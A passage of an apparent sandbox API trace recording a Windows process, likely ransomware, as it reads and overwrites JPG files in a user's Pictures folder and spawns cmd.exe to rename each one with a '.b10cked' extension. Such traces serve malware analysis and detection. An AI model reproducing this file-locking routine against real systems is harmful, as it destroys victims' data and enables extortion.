hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xa60f [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.282] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xa127 [0143.282] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xa60f [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xa60f [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.283] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.283] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5306, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5306, lpOverlapped=0x0) returned 1 [0143.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5306, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5306, lpOverlapped=0x0) returned 1 [0143.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-21254, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5309 [0143.284] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5306, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5306, lpOverlapped=0x0) returned 1 [0143.284] SetFilePointer (in: hFile=0x114, lDistanceToMove=-21254, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5309 [0143.284] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5306, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5306, lpOverlapped=0x0) returned 1 [0143.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="If0lC.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.288] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="If0lC.jpg", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="If0lC.jpg", lpUsedDefaultChar=0x0) returned 9 [0143.288] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xa60f [0143.288] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.288] CloseHandle (hObject=0x114) returned 1 [0143.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg") returned 0x23 [0143.289] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0143.289] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\If0lC.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x934, dwThreadId=0x8cc)) returned 1 [0143.291] CloseHandle (hObject=0x110) returned 1 [0143.291] CloseHandle (hObject=0x114) returned 1 [0143.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.291] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.291] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 2 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.291] ReleaseMutex (hMutex=0xf8) returned 1 [0143.291] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\isdkb.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.291] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20008071828) returned 1 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x138a8 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x133c0 [0143.293] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x138a8 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x138a8 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.294] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9c53, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9c53, lpOverlapped=0x0) returned 1 [0143.294] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0143.295] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9c53, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9c53, lpOverlapped=0x0) returned 1 [0143.295] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40019, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9c55 [0143.295] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9c53, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9c53, lpOverlapped=0x0) returned 1 [0143.295] SetFilePointer (in: hFile=0x114, lDistanceToMove=-40019, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9c55 [0143.295] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9c53, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9c53, lpOverlapped=0x0) returned 1 [0143.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="isdKb.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0143.299] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="isdKb.jpg", cchWideChar=9, lpMultiByteStr=0x131326c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isdKb.jpg", lpUsedDefaultChar=0x0) returned 9 [0143.299] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x138a8 [0143.299] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0143.299] CloseHandle (hObject=0x114) returned 1 [0143.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg") returned 0x23 [0143.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\Pictures\\") returned 0x1a [0143.301] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg\" \"C:\\Users\\EEBsYm5\\Pictures\\isdKb.jpg.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x6f0, dwThreadId=0x8b8)) returned 1 [0143.313] CloseHandle (hObject=0x110) returned 1 [0143.313] CloseHandle (hObject=0x114) returned 1 [0143.313] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.313] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Pictures\\", cchLength=0x1a | out: lpsz="C:\\USERS\\EEBSYM5\\PICTURES\\") returned 0x1a [0143.313] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\PICTURES\\", cchCount2=26) returned 2 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0143.313] ReleaseMutex (hMutex=0xf8) returned 1 [0143.313] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Pictures\\kYWWkRklabLUzyrJ9.jpg" (normalized: "c:\\users\\eebsym5\\pictures\\kywwkrklabluzyrj9.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20010296358) returned 1 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d5e [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0143.314] 